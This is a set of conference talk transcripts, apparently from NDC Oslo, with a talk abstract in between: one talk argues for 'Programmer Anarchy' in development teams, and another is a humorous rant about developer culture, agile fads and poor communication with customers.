college looking like, oh, you know what, I did yesterday. He says, yeah, I just pulled the data into the same reports. Whoa. And all of a sudden we started driving ourselves around our daily information. The feedback cycle was starting. And Carl writes some more tools and some other stuff like that. So basically it was our first anarchist. We just turned him loose and said, make money. And we got out of his way. And he didn't understand that you should just bring more people on like that. When you threw the other guys in there, he couldn't give directions. And all of a sudden they start doing clever things that he wouldn't think of, anarchy. So that's the story. The name of the presentation is Programmer Anarchy. I do have a cheesy logo. Actually, you do have t-shirts with this on it as well. But yeah, power to the programmers. I think I have a bit of time for questions. Any questions from a Norwegian audience? I got a lot of questions in roots, by the way. Those guys over there, I ask questions. How do you get the stuff in that leads to the backlog? Backlog is part of the term, intellectual masturbation. Tell me what you need next. All this other stuff about trying to prioritize and make a list of everything you might need in the future, you're wasting your time. You can probably tell me as you're a real business owner, what do you need? It's the most important thing next. Now you may have this list in your head, but why are you trying to share it with me? I don't need that information. Tell me what you need. To some degree, we let some of our clients that we use, pray backlogs and have all sorts of meetings about that. We let them know how old they're means they want to. It's completely useless. Just tell us what you want to do next. That's all we care about. I think one of the things that I had with our founding guy very early was, I come out of IBM. I got 17 years in IBM. I understand strategies. So I said, Neil, what's our strategy when you said this? Our strategy next year is to make twice as much money. I'm like, dude, that's not a strategy. So we go around a few times without that. Sure enough, next year we double our money. Next year I say, what's the strategy? What's the strategy? Well, Neil says the strategy is going to double our money again. I'm like, Neil, that's not a strategy. Doubles is money. Third year, I don't even ask the question anymore. To some degree, there was an Irish and Harvard review article a few years ago that said, a company that has very crisp strategy will probably go out of business because they will constrain the opportunities they will pursue. It becomes a self-imposed set of rules. So to some degree, I'm very comfortable with an organization that has no rules about what we do next. And so concept of backlog and it's perfectly on our strategic plan, all these other things, complete nonsense, you probably want to ignore them. Trust your people to go do the work. Another question. Yes, sir? How does this scale? Actually, I would claim that anarchy is the only thing that scales. Where's the need for anything else? It's about limitations with a group of people that like rules that you are more than 160 people in a group who are not able to know what everybody does. Yeah, so DRW trading has 400 programmers, four managers, and they're running anarchy. This is Dan North and his company. Facebook you would claim, I would claim it's 2,000 programmers running the same way. Look at Facebook. All of a sudden you see the press, oh my goodness, Facebook releases feature, compromised privacy. You go to these Facebook guides, you say, okay, well, who lets you do this? And they're like, I'm sorry, we didn't ask permission from anybody. We just do it. They're anarchists. And they say, we read the same trade press you read. Well, it turns out it's a bad idea because people say that, we listen and we change it. Now meanwhile, you got MySpace over there saying, oh, this is a good Facebook feature. Let's put it in our plan. Let's have a meeting about that. Let's put it into schedule. They're getting ready to actually, you know, how to get that development. And I'm like, oh my goodness, they got a new feature. Let's go do that. And never did anything. It turns out time to market is very important, almost more important than getting it perfect. In other words, you don't need to get it perfect. You just need to get it pretty good. And if the market tells you it's pretty good, accept that as a judgment. And so I would say Facebook is doing it in 2000. Now if you want structure and rules and allegations like that, you can put them in place, but you're going to find out putting the hierarchy back in place. It's going to become empowerment versus anarchy. So I would say anarchy just scales. Two teams use different technology. I don't care. One uses Chef, one uses Puppet. I don't care. Should we use one thing? Probably, but if Puppet's the best and knowledge will spread around and Puppet will win or Chef will win. It's natural selection. But we're not going to try to force it. Our CTO left a few years ago. We didn't replace him. While we were replacing him, he was trying to make rules. We needed to make rules. We were perfect comfort in making our own rules or no rules in this case. So I think it scales because we're not trying to resolve disagreements. That's where you need to scale. That's where you need structure. We don't need the structure. Put bright people together, they'll figure it out. By the way, I think it was a comment in the last session that I attended about, you know, if somebody doesn't work out, whether they're not performing right, we kick them off. We kick them out. Well, and we've got UK restrictions about firing people like everybody else does. We buy them out. We're like, here's a big check. Go away. And they'll use it, go away. But they're hurting us, you know, so get out of the way. We have to pay attention where the team says that, you know, HR jumps in, make it happen. Other questions? Yes? A small question about your organization. Is it still developer driven or do you have people that have to know how about the user flow so you don't feel too complicated using interfaces and things like that? And if so, where are they in the organization? The user experience people are baked into the teams. And so we have the guy, one of the guys, Andy Kent at the top of the list. Andy Kent just has a natural way of building amazing user flows as well as being a killer programmer. He's originally a web designer. He's got the JavaScript. He went on to a lot of the languages. He can write closure. Just an amazing guy. I have gotten awards for my UI design by copying one of his. And I don't mind copying. I mean, I copy all the time. But, you know, that's how good some of this stuff is. So we make sure we have that sort of people baked into the team. And that's, again, they'll hire that. They say, you know, we need some more user experience people. They're hiring. You hire who you want. Let's go find a bright guy doing this. So again, they understand what they need and they'll go get it. The business owners. Yes. What response will they have? They need to provide us a vision. I mean, to some degree, there's also business metrics. We're in web businesses. We have contracts with energy firms. There's a lot. I mean, there's 370 people in and forward. And of which, probably 70 of which are programmers. And they're running their own little subculture within this. I got a call center. They're running traditional style. I got marketing people. They have titles. Certainly people going out and buying services from contractors. They have to have titles where they can't get in the door. You know, they're labels. But we give them the labels they need to. In that case, not only the development. Mostly it's in development. I would say we're lean, we're say, lean slash agile across our entire organization. HR has a card wall. They use for recruiting people. Finance has a card wall when they're trying to do various things. You know, here's a story I need to do and get ready for the weekly audit. So that's a story. They place story cards. They have stand-ups. They do all the stuff like that. So they're working their way through the agile process as well. So that's the nice thing about starting with 35 people when I joined and we're 370 now. We were able to put these processes in place. In fact, again, again, a brilliant founder. He hires me because I work for ThoughtWorks at the time. We walk in and do a project for them. They're thinking, oh, I hired this high-tech company. First thing he sees is we're taking these index cards and gluing them to his wall with crayons and writing all over them. And they're like, where's the high-tech dude? You know? But we delivered. He was like, okay, there's some magic there. I don't understand it myself. Oops. I don't understand it myself. But he does believe it actually works. And so the first thing he did to hire me was I want my whole organization agile. I said, okay, well, I figure I'll do that. And so we had a class about all this stuff, taught people stories and how to write stories, even though they're not stories about programming. It's still a great technique. So yes, we did the same thing. Sorry, a long answer to a short question. Thanks. You're welcome. Another question? Yes? Well, yeah, I think this is a process that I'll probably never going to go away from. Because it's just incredibly efficient. I think now versus when I was writing code maybe five or ten years ago, I mean, I got Amazon Cloud, I got Heroku, I got ways in which I can constantly deploy with all over the overhead. And I think not taking advantage of that is leaving. And I think time to market, we've learned this in business school a long time ago, time to market is really important. But I didn't understand you can make that a day. Not in my world that I grew up in IBM. But a day between, I mean, we've had regularly we have a programmer who would get two new business requirements and then deploy the same day you get them. I mean, he's never heard about these requirements before. He can get them and he's got something deployed the same day. That's how fast we're running. And I would say, and I think I would never work in a business that's the simple organization structure would work for. There's no interesting problems. I'm a guy who actually, if I go to the Kenneth Fenn model, I'm a guy who loves complex. I'm in this no cause and effect. Let's try some levers, let's play. That's my world. I love that world. I'm, in fact, if it's not a chaotic environment I'm working in, I will tend to create chaos just to make it interesting for me. They learned that in IBM. So I was moved from role to role because as soon as the chaos was started to settle down and got to be routine, they knew to get me out of there. Because I'd only kind of mess it up again. So again, I think it aligns up with what I like doing. What you like doing, you may be, you may like, you know, you're toast buttered on one side and be perfectly buttered every morning and you may want to live in a different sort of the world. But this is the world I like to live in. All right. I think I'm out of time. I'll certainly hang around for a little longer. If you want to have questions or tell me this is just crazy. But we're making a lot of money. So not bad at all. Thank you very much.
|
The Agile movement shifted the relationship between clients and developers in a profound way. In waterfall processes, clients specified large amounts of functionality, then nervously faded into the background until the fateful day-of-delivery. With Agile, developers strove to engage with clients continuously, and delivered much more frequently against their needs. A new trust was established. At the Forward Internet Group in London, we are implementing a second major shift between clients and developers. The trust of the clients in developers evolves into a broader trust of the developers to deliver business value without resorting to a series of well-defined stories. In essence, the business has empowered the developers to do what they think is right for the business. This model, popularized by Facebook, has several labels, but the one we prefer for our flavor is Programmer Anarchy. We will start with stock Agile, and begin to apply environmental factors that led us to drop “standard” Agile practices. We will also watch as well-defined Agile roles evaporate completely as other environmental factors are applied. Finally, we will arrive at Programmer Anarchy, an organization often following none of the standard Agile practices, having no BA or QA roles, and even missing any managers of programmers. We will summarize our environmental factors, and postulate on the required and optional factors. We will make bold, controversial assertions. We will back up these assertions with actual experiences. Programmer Anarchy has garnered rave reviews at every conference venue, and is provoking the intended debate on our current Agile thinking. Target Audience Agile-Lean practitioners who are feeling the "warts" in their implementations; programmers and project managers.
|
10.5446/50967 (DOI)
|
Yeah, I'll catch you if you fall except if you fall backwards, right? I had a whole bunch of jokes prepared that had to do with the hanging stage and then they tell me I'm in this room So is it nine? You've all got such serious faces. Oh, this is your face when you're having fun. I have a whole group of friends that have come from all the way from Australia, right? Australia is sitting in the front row. So if you needed to see what Australians look like, except this guy, he's Polish. Okay, so good morning. Had a good party last night? This is just reinforcing my talk even more. The title of the talk is somehow it's disturbing because I was really pissed off when I suggested that I give this talk at NDC. That kind of passed. So I didn't know I had put here welcome my prima donnas, but I thought no, I'll just put welcome and that way I'll be very, very neutral and safe because you should be safe for your life, right? No, you shouldn't. Anyway, how was the party last night? Good? Yes? Good. Okay, that's good. I like you because you like you show me. Yeah. Did you? Did you drink a lot? Okay. Are you hungover? Okay, so this is the wrong talk for you then because I'm going to set your expectations of this talk. I want you to know exactly what to expect. Okay. And it's pretty much nothing. This talk does not have any content. It does not have any takeaways. In fact, I was just coming by the booth, walking past Pluralsight and they said, are you ready? I'm like, I don't know what I'm talking about. And they said, well, tell them that they can come by the booth and win an iPad. I'm like, well, there's content for you. So your takeaway is you can win an iPad at Pluralsight, right? But seriously, it's just think of this talk as if you don't know me, I'm a nice guy, but sometimes I'm known to rant. And this is like me ranting in a bar, except none of us have having beers or drinking anything. So it's going to be a little bit harder to put up with me. Okay. Me, I'm a developer. I'm a technical evangelist at JetBrains. You all know the company JetBrains. Please appreciate that anything I say here has nothing to do. I do not represent my company. So don't stop using reshoppers as soon as you leave the room or any of our other tools. But today, I'm not a developer. Okay. Today, I'm not a developer. In fact, as a technical evangelist, a lot of my time is spent in what some would call the marketing department. You know, the ones that we hate as developers, right? Yes? Yes, we do. Bastards along with the sales people, right? Today, I'm pissed off. And this is this could be considered child abuse, because that's my that's my third son. He's around three months old. And it took me quite a while to take that picture to the point that my wife was getting really pissed off. And she's like, you want to know what pissed off is take a picture of me. That was the best shot I could get off him. So but I don't want to talk about me. I want to talk about you guys, right? Do you remember this guy? Right? The developers, developers, developers, you all remember that know how we were the center of attention. Yeah, how we were we were going to change the world. Right? You remember this guy? How many of you know this? Who knows this guy? Right? For those of you that don't know this guy, this is Steve Sinovsky. Okay, can you please switch off the recording at this moment in time? How many of you love silverlight? How many of you hate silverlight? Okay, so you love this guy because he hates it silverlight as well. He's he's one he's the guy that runs Windows division. He's the one that runs office division. No one knows him when we talk about Microsoft as developers, we know Steve Ballmer. Nobody knows him. We have him to thank for Visual Studio no longer being free. Maybe we don't know. But he's going to rule our life from now on. If we're staying in the Microsoft space. Okay, he's responsible for this. How many of you know Visual Studio 2012? How many of you hate uppercase? How many of you are passionately hating uppercase? How many of you spent a vast majority of your time arguing about uppercase? How many of you think that's sad? And when will you start stopping? You won't, right? Because if they make it lower case, you'll say yeah, but the font sucks. It's sad, right? Because before, you know, we were developers. Anybody old enough to know what that is? Well, or has a grandfather or father that was a developer that used a punch card, dressed in suits? Yeah, now we're all kind of, you know, we look different. I had a meeting with a guy with my sales team at JetBrains. We had an internal sales meeting. And he was making a presentation. And he was talking about the developers in the company. And he put that picture up. This is what sales and marketing think of us. Right? Some of us actually look like this at some point in our lives. Some of us still do. This one is really funny. So is this one. In fact, there is a movie online, which I recommend you watch, which is called Erlang, declarative real time programming now. And you don't know if it's real or it's a Monty Python sketch. Seriously. And these are the two actors in it. These are real people, they're developers, right? And then at some point, you know, Hollywood gets wind of us. You remember this guy in Revenge of the Nerds? Yeah. And then Hollywood continues to get wind of us. The only difference is that now longer, we no longer a geek, we're a what? A hipster. There's actually a hipster corner out there. If you're a hipster, go there. Right? Which represents the reality. You know, how many others open up their stock market, debut with a hoodie. But we're not like that. You know, you can't stereotype people. This is these are real developers. I asked for some pictures of real developers. I mean, look at them. They look like you and I. Yeah, we even have one of them in the crowd over here, the one with goat beard. I mean, some of them actually look cool even. You wouldn't say these are developers, right? So you can't stereotype us. But what are we doing? We are stereotyping ourselves. We're starting to classify ourselves as different types of developers, developers, right? And the typical stereotyping of developers is the enterprise developers, right? Which were just like a plain vanilla box. We're as boring as it gets. I mean, really, really boring. Then we have the hipsters, which if you go to Wikipedia, that's what a hipster looks like. Okay, it is. That's the definition of a hipster. I don't see any hipsters here. Any hipsters? So we're all the square box, right? We're all rectangles. So you can say, well, these are the two kind of categories of developers that the world is pushing onto us. There is a third one. But I don't consider that development. And that's my friend Sahil. You all know Sahil Malik. I greatly respect him. But he's a chef point. I won't say developer. We were actually having dinner last night. And he was telling us about his boring life, how he's ordered the same meal for three years, the same exact meal. He says, that's how much I love Iranian food. I'm like, yeah, I was born in Iran, but I don't even do that. You spend all your life in SharePoint dealing with lists. That's it. That's the highlight of the development. Okay, but fortunately for us, this is about to change, right? We're no longer going to make this separation because Microsoft has joined us. Right? If you go to the Meet Azure website, which was launched yesterday, this is the front page. Have you noticed something? The large corporate enterprise Microsoft represents has a picture of a hipster. Okay. Yeah, we're trying to get with a Mac. Right? We're trying to bridge this gap. We're trying to stop stereotyping categorizing because it doesn't do anyone good. But you can be none of this and you can be the most awesome developer in the world, the Ninja developer. Right? How many of you are Ninja developers? Right? I mean, think about it. What other profession in the world categorizes themselves as ninjas? I'm a Ninja brain surgeon and I'm going to do your brain. Right? Or how about Jose, the Ninja plumber? Seriously? I mean, why? Why? Why are we categorizing ourselves as ninjas? We have this obsession with ninjas and mastery and masonry and kata and kata and martial arts. Huh? And unicorns. Oh, yes, unicorns and lolcats. Right? There, I mean, what are the profession does this? Well, there is one. Right? The actors on stage, the prima donnas, the, you know, center of attention, the Hollywood people, you know? And talking about Hollywood, there is Twitter. How many of you are on Twitter? Right? How many followers you got? 100? 500? More than a thousand. 10,000. Right? You know, the more time you spend on Twitter, the more followers you get. And you start to feel really important. Right? Holy cow. I have 500 followers and I've only been doing 500 tweets. That's one tweet per follower. Ooh, now I've got 10,000 followers. Ooh, now I got 20,000. Shit. Now I'm 45,000. I must be important. I mean, if I have 45,000 people following me, I must be saying something important. Right? Something really, really important. That's life changing. I am influencing people, especially if you sign in with cloud. Cloud tells you what you're influential about. Right? If you say, I'm going to go and eat pizza, you're influential about pizza. And as your followers grow, you start to believe that this is really important. And my existence is no longer about software development. It's about guiding others. It's about leading the path to others and making sure they know what to do because I'm saying important things. This is a Twitter account that all it does is say, Bong. And when it's two o'clock, it says Bong Bong. It's got 226,000 followers. There are Twitter accounts of people that are well known that have 100,000 followers that haven't tweeted. It's kind of like if you ever saw Forest Gump, how many of you have seen Forest Gump? Right? Remember when he's running? He's running. He's running. And everyone's chasing him. And everyone's following him across the country. And then he suddenly stops and everyone's waiting for him to say that big moment. Turns around and says, I'm going home now. Right? Everyone's waiting for these important figures to say something and they never do. If you want something said, follow Bong Bong. Or if you don't like them, follow the office chair. They're much more valuable. All the common squirrel. Really, Twitter has made us think that we're really important. We're not. Even in this stage of microcelebrities, we are. We're nothing. We're a drop in the ocean. I mean, nobody came to my hotel screaming, but they did go to Justin Bieber's hotel screaming. You know, our profession is something else. Our profession is about solving problems. It's not about being a ninja, but it's good. Right? By the way, Twitter has given us something. It's made us expert procrastinators. Right? Between Twitter and Facebook and arguing on different mediums and forums, we have become an expert in that. So it has provided something valuable. Fortunately, some of us, including my friend, has actually realized that there's better ways to do it. Right? He delegates it. And he doesn't even read his tweets anymore. Right? It's kind of like, oh, do you know what TLRDR stands for? How many know what that stands for? It's like too long. I don't want to read it. Just give me the summary. Twitter has made us. Now you go to blog posts and there's no longer a blog post. It's like, there's no longer summary. It's like TLDR. Windows Azure is bullshit. That's it. That's what my blog post is saying. Right? I'm making you more lazy. You're accustomed to Twitter, so don't read anymore. But it's good. It's fun. It's because we care. Right? I mean, how many of you care about your profession here? Damn right, we care. Well, half of the room didn't put up their hand. I wasn't expecting that. Damn right, we care. Oh, Jesus. How many of you have been forced into software development? Okay. So that half of the room is probably SharePoint developers? Right. So that's why you're pissed off at me. That's why I'm getting these looks. Okay. We care. We do care. See, back in the old days, we just used to get shit done. Right? And then they told us about agile. I'm not going to take a dig at agile. No one gets away today. Right? You know what agile is? You all know what agile is. How many of you are following agile methodologies? Right? Interactions and individuals over processes and tools. That's the first one. Let's just concentrate on that one for a moment. Okay? This one. And we talk about scrum. How many of you do scrum? Yeah. You do the burn down charts and you do the iterations and you do this and you do that and everything's great and everything's cool. I used to teach scrum. I used to do coaching on scrum. Right? I used to do, you know, teach people how to do scrum. And I used to go to companies and I would tell them about scrum. You know the first thing they would do? A week later when I would leave, I'd call back and say, how's it going? Oh, it's excellent. I'm like, yeah, he says, yeah, we got these little post-its with our company logo on it. We just, I'm like, okay, and good. Like, yeah, but we've got a distributed team, so we're going to write our own software to manage it. We're going to do a scrum board. That was suddenly the focus shifted from trying to improve to the tooling. Right? But then after a while, we realized that scrum doesn't work because, oh, wait, well, that's because we want certified. So you can become a certified scrum master in a two day course. Right? And then you can teach others to become scrums. Really think about that for a moment. How the hell am I going to become a certified master in two days? Honestly, how? Paying cash, right? Because if we'd use the word master in mastery as in being a master of something in two days. But then we thought that the scrum thing doesn't work either because there is this concept of a time box. And we feel like restricted, right? I mean, we started to see that these two week iterations aren't enough because we get exposed to outside external forces, whether it's a bug, whether it's a customer change, because not everything is ideal in this ideal world that they paint for us. And they said, okay, well, that doesn't work. But you know, Toyota, which we do have an obsession with Japan, Toyota does lean. And lean is about controlling the flow. Right? We need the flow to go. And this concept of iterations, just forget about that. It's all good. We'll do Kanban. And now we got Kanban boards. And now we got everyone and their mother writing software for Kanban boards, including us. Right? And people start to work on this Kanban or lean. And they say to us, oh, I can't use your software. Why? Oh, because there is no Kanban board. Okay. Okay. There is a focus on tool. No, but it's not about the tool. The Kanban board shows me the flow. Fair enough. But what was great two years ago, now is crap. We've evolved, obviously, we've learned from our mistakes. But we keep focusing on process, process, process. But the funny thing is that this restriction of the time box, some say that that's a good thing. Do you know the Pomodoro technique? How many of you have heard of that? Right? How many of you use it? Okay. So the Pomodoro technique basically says take your egg timer or the Pomodoro in Italy, and you turn it around and it's like 25 minutes. And you prevent any interruptions during these 25 minutes. And you get your work done. Right? You're taking away self-discipline and putting it in the hand of a tomato. Right? Because we always need someone else to help us because we're so lacking of self-discipline. And then if it doesn't work, we'll say, no, it's not my fault. It's the tomato's fault because the 25 minutes weren't enough. No, the problem is that you want a certified Pomodoro master. You can get certified. Really? You can. You pay money and you will become a certified Pomodoro master. And then you can teach other people to turn egg timers. Right? And then you can join the world of Pomodoro, where you can be a user, a reporter, a speaker, a team member. Me and my family, we're a bunch of Pomodoros. We make a great team. I'm not making this shit up. I swear. It's there. And I was thinking about this the other day. I said, wait, they said to us that the Pomodoro is good because it restricts you in time. And they said to us, Scrum is bad because it is restrictive. What if I take Scrum and Pomodoro together? Maybe that would work. What do you think we could call that? Give me a wild suggestion. Scrum-O-Doro, that's a bloody good idea, isn't it? Too bad someone else had that idea. Look at the date. I actually picked this up on my way to Oslo. I'm like, no. I mean, this damn talk is writing itself. All I got to do is just sit on Twitter and let the bullshit pour in. Scrum-O-Doro. I mean, come on, enough is enough. We really are losing it. We have become so obsessed with agile and lean and agile and lean and this and that and that and this and always looking for the next excuse to solve our problems instead of concentrating on the damn problem. And then, of course, we have the divorce of agile with software. A couple of years ago, I was at a conference in the US. It's called the Agile Conference, right? And there was like 5,700 speakers, 10,000 talks. It was like five talks on software. It was all about process and process and agile and this and that and that and that. Why the hell did we do this? Who did this? A bunch of software guys wrote this manifesto and we've completely lost touch. Even on InfoQ, in the website, Uncle Bob and others protested and they said, guys, we've lost touch with our roots. And it was true. We were so evolved around the process that we lost touch. And Uncle Bob, who loves Uncle Bob? I mean, you can't not love this guy, right? And I am gratefully, eternally grateful to this guy because he has taught me a lot. Him, Michael Feather, other people that I look up to in the software profession. And he talks about craftsmanship, right? We talk about craftsmanship and everyone realizes and what Uncle Bob is saying that you have to care about your profession. But yes, but you have to care about your profession, whatever your profession is, no? Right? Except if you're a SharePoint developer. Okay. You have to care, right? I mean, how many of you are in this for the money? How many of you would stay in this if there wasn't any money? He's like, maybe. Yeah, families. Yeah, you don't have kids, right? No, the one behind you. No, there you go. You can just go and hang out by the hipster booth. Yeah. Right? But the problem is that now we get into craftsmanship and craftsmanship is about what? It's about caring about code. It's about clean code. It's about unit testing. It's about test driven development. And we start to care about these things. And then we start to have these wars on principles. Damn you to hell. You didn't use the single responsibility principle. I have been in the profession for 50 years and I have never read the book on the gang of four. And I'm successful in my life. Oh, well, you're an idiot. Blah, blah, blah. And this and that. And it's just, I know, really. I mean, look what you're arguing at that. It's good to be passionate, but don't forget what we're doing. What are we here to do? I asked that once from a guy that, from a team and a company I was at. They make new software CRMs, etc. And I said to him, what is it that you're here to do? And he says, sell software. I said, no. What is it that you're here to do? Make new versions? No. You're here to help people. You're here to solve their problem. You're not here to have debates that are meaningless. And we're very good at that. Testing acronym wars, right? Test driven development, acceptance test driven development, behavior driven development, framework driven development. Do you know what framework driven development is? It's, oh, I've just come up with a cool framework, which is different to your framework because instead of has says should and done, right? Because TDD is different from BDD. So I need a BDD framework bullshit. TDD and BDD. And I wrote about this and I know I disagree with Dan are not different. And he actually said, if you're a developer, they're not what Dan has contributed is great. He has said he has made it apparent that BDD can be about other people understanding tests and using them as specifications. For me, BDD has always been about communication. It's about communicating with people, right? That's what it's been about. But now, software developers, the first thing we do is we're like, oh, well, TDD, right? Now there's this BDD thing. Oh, you know what I'll do? I'll write a framework and then I'll become rich and famous on this framework. Well, you won't anyway, because it's open source without truly understanding what it is you're trying to do. And then you get other people looking at your frameworks and then we start to make this artificial distinction. And then we start to have wars about how TDD is better than BDD or is it ATDD? What are you doing? Should you do ATDD? No, take a course on BDD and come and do BDD while your other department does TDD. And they're so lame because TDD is so last week, right? And the point of all this is to communicate with the customers, understand them better, implement software that works. That's why we get crap like this come up, right? This is from Zed Shure. He is pissed off and he's fed up with all the manifestos. He's through with XP, he's through with agile. He just wants programming MF, right? This is real. This is actually a website. It's called programming-the-whole-word.com. And this is what you get, right? Now he's got a point. How many times are we going to continuously put the blame on others for our mistakes, right? How many of us have continuously bitched about all the processes which were not agile, waterfall, this, that? Before all that, how many of you were still delivering working software? You were. You've improved, yes, but don't lose the plot. You're still about delivering software for people. That's what we do. The other thing that agile points to is interactions, right? You know what a prerequisite is for interactions? Communication. Communication. You know, have you heard communication is key? How many of you have heard that? Yeah? In an agile team, it's not about tools. It's about communication. Communication is fundamental. Communication is key. That's the important thing. The only problem in software is communication. There's only two problems in software and it's communication. That's a funny line, right? What are you doing to improve communication in your team? Oh, I'm doing my daily stand-ups. Ah, good. So you speak for five minutes, yes. You have an actual structure of what you say, yes. What I worked on yesterday, what I'm working on today. What else do you do? I talk to the guy next to me. Ah, what does he do? He's a developer. Okay. Who else do you communicate with? My wife. She doesn't understand me. Do you know what my dream would be? What? To have a wife that's developer. Why? Well, then we can sit on the sofa and talk about programming languages. Yeah, don't broaden your horizons there. No, no, no. And you know, of course, what they say, right? We are introverts, right? We are by and large introverts. Who is an introvert? Now, a true introvert wouldn't raise their hands, no. Well, but fair enough, we are introverts and that is fine. And I'm not putting down introverts. Well, I'm not. Today I'm marketing. Okay, standing up here. I'm a marketing guy. We are not, it's not bad being an introvert and we shouldn't push introverts out of their comfort zone, right? And but there is a myth around introverts, right? Introverts cannot communicate. We have a hard time communicating. That is a myth and we know it. Go to hack and use. Right? The amount of time we spend debating in a more or less sensible fashion with sensible words over absolute bullshit is incredible. We don't have a hard time communicating. The only issue is we like to communicate in an intelligent way, not that everyone else is stupid, but we kind of measure our words and we think well about our words before we communicate. And we spend hours on end discussing semicolons. This is just a search for semicolon. And this is about Stugglers Cockford, if you haven't heard, said in one commit on GitHub to some guy that, well, there's a bug in this library and he said, no, there isn't a bug. He's left out a semicolon. This sparkled this. And this is just one fraction of the internet. The Twitter wars and the GitHub wars and the this wars over a semicolon. Just use the damn thing and shut up already. No, really, why? Oh, well, Douglas Crocker was rude. Well, no shit. I mean, the guy knows what he's talking about and he says the code is crap because it doesn't have a semicolon and he's right. Oh, no, no. Oh, it's not about what he said. It's about the way he said it. Yes, coming from a developer who knows how to communicate, right? No, really, why would you care about semicolons unless you write JavaScript? The problem is that we hate small talk, right? Who loves small talk? Who has kids? Who has to go to birthday parties of kids from school? So where my kids go, I live, if you don't know, I live in the pit of failure or otherwise known as the third crash ever of Europe or Spain. And I go, you know, a lot of the people that around me were there. There was a big property boom there. A lot of people there talk about property, right? A lot of people are in real estate one way or another. And I go to these things and I'm like, oh, God, what am I going to talk to them about? Right? The highlight of my great time there is someone says to me, I've got this problem in my computer. I'm like, yes, now I can say something. Otherwise, I have no idea. I hate football, you know, which is the national pastime in Spain. Well, I mean, what am I going to say to these people? How many of you felt like that? Right? And you go to a party, you're like, God, I hope I find another developer there. Right? And then we're like, so the only way we start to talk bullshit is if we drink enough. Okay, now why? Because who the hell are we communicating with all day? What are you doing in your job to improve your communication? What are you doing? If all you're doing is talking to developers, do you think anyone outside of a developer understands you? Are you comprehensible? Small talk is not bad. Understanding to be social is not a bad thing. You can't always expect to talk to people of the same level as you. And I don't mean intellectual, I mean in the same arena, you have to learn to talk to people that have different interests, because it helps the communication flow. It helps you understand, it helps you express yourself in different ways. It's not about we are the smartest guys in the freaking world, and we're just going to talk the way we talk, and we don't talk bullshit, except when we talk about semicolon, but we don't talk bullshit, and we don't like this small talk crap about how the weather is. I don't give a crap about the weather. You do. You live in Australia, you shouldn't, and it's always sunny. And the other thing, should you ask yourself, does incomprehension reflect on your work? Does it make your code more complex? I mean, what is code? It's an expression of oneself. Does it make your user interface more complex? Developers suck at user interfaces. Yes, but you know why? Because we suck at communication, right? We don't have a clue on how to communicate with anyone that's not a developer. And we think that everyone is as smart as us, and everyone understands things, and if they don't, they're stupid. I had to give up a company, seriously. I had 50% in a company, and I left that company, and I gave everything I owned, because I couldn't work with a developer on the team. When I used to ask him something, or someone else used to ask him something, he would explain it. If they would not understand it, he would say, you're stupid. Right? No, you're stupid. You're stupid for not explaining it in a way people understand. If you explain something to someone, and they don't understand, if you explain it again, they don't understand, it's your problem. It's not their problem. You need to explain it in a way they will understand. But if you talk to our developers that know exactly the same as you, it becomes harder to talk to people that are not developers, including who? Your wife. Yes, that is higher in the rank of importance, but I was going to say customers. And then we get this. And you know, I'm not going to take a screenshot of anyone else's software. No, I'm going to take it of our own, of JetBrains. Right? This is a screenshot of U-Track, and hopefully it's fixed or will be fixed after I had a little discussion with the developer. You know what that is? U-Track will poll TeamCity every X minutes. That is a quartz expression that you have to enter to say how many minutes would you like for me to poll TeamCity. Really? I was expecting a little spin box, two minutes, two hours, five minutes. No, no, no, click on that link, read the whole regular expressions on quartz clock and that and then enter the expression. And when I talk to Dimitri, he says, well, what's wrong with it? I'm not... It's flexible. And that is a problem because we don't know how to communicate and we just think that everyone is at our level and it doesn't matter how many times we say it, it still won't make sense. This is TweetDeck. If you've ever had TweetDeck and you don't have an internet connection and you have several accounts, you're a professional Twitter or a twat like me, this is what you get. Forget the message that, you know, to a Twitter guy doesn't make any sense, but just constantly repeat it to me because that's really going to help me understand. But you know, the problem that this is that it leads to bigger problems, right? It leads to things like, I don't talk to customers because they make me nervous. A very, very, very smart developer told me this just last week and I won't name the person, but it said, because I won't say it's a male or female. I mean, it is, but I won't... I don't want to give off any hints. It said that they make me nervous because I can't communicate with them. Okay, fine enough. I don't need stupid customers, right? Yeah? As a marketing guy, I say to a developer, you know, the customers don't understand this. Well, screw them. They're stupid. No. If you don't talk to your customers, how do you know if they're stupid or not? Right? It leads to this. It leads to these problems. And then we say, oh, we hate sales and marketing people. Yeah, you know why? Because they don't look at customers the same way you guys look at customers. They have to deal with customers. They have to do social activities with customers. They have to do social talk, but it's part of the deal, right? Because for us, it's important. Why? Because we are solving people's problems. That's it. We can't say let anyone else do it. Remember how we said one of the issues was that, you know, the project manager talks to the customer and then that goes to the business analyst, blah, blah, blah. And by the time it gets to me, it's completely different to what the customer said. And now we say, yeah, but let someone else deal with the customer. I had... I tweeted something and someone replied to me and said, I never talk to customers because they really, really piss me off and I have a middleman do it. But that is a problem you need to solve for yourself, right? Because it will make you much better in all aspects of life, right? And when I say communicate with others, I don't mean going to a shop and ordering something, right? That's not improving your communication. And we get this customer disconnect, right? Because if we don't learn to speak the language of the customer, if we don't understand emotions, if we don't understand the different people of different countries in this global world that we live in express themselves differently, right? If we don't learn to deal with these things, it's dangerous because we can start to offend people. We can start to offend customers. And you know why this happens? A lot of times, this happens is because we have a disconnect from revenue. If you work in a company that sells shrink-wrapped software, you often are disconnected from that revenue. Customers getting pissed off doesn't immediately have an effect on your salary. If you work as a consultant, customers getting pissed off doesn't immediately affect on your salary. And you start to lose sight of where your salary is coming from, where your income is coming from. So you start to care less. But if every time they say to you, if you piss off a customer, we'll piss you off by reducing your salary, will you start to care a little bit more? No, you'll say that's unfair. The customer's an idiot. He was wrong. How do you know? Did you talk to him? Did you understand him? Right? This is important. And this can break a company. This can destroy a product. It destroyed a product I was working on. And again, we're losing the plot. We're thinking again, so much about us. We're so self-involved about our product and how our product is great. And we must, we have tens of thousands of users. So our product must be amazing. And our customers are using it. And they must be happy. I don't know. If you make custom software, how many times do you go during a year and sit next to your customer for a whole day and see him frustrated and angry with your software that he doesn't communicate back to you? Because he says it's not worth it. These idiot developers don't understand anything. It's not only our fault, it's their fault as well. Right? But we're not going to sit back and say, well, it's their fault. We should drive the change ourselves. Then we have another issue that's come up. Now is the knowledge-driven design or as someone else called it, CV-driven design. Right? The Church of Technology Fashion. Right? This is from one of these videos on Node.js, which, you know, the two, the one says, oh, Node.js is great and the other one's, you're an idiot. And oh, no, you're an idiot. Right? And he says, you're subscribed to the Church of Technology Fashion. And it's true. You know, remember Clipper? How many of you did Clipper here? Wow, I was expecting more than one. Oh, at least Delphi. I did Clipper. I did Delphi, MongoDB. Right? All these different technologies that are coming and 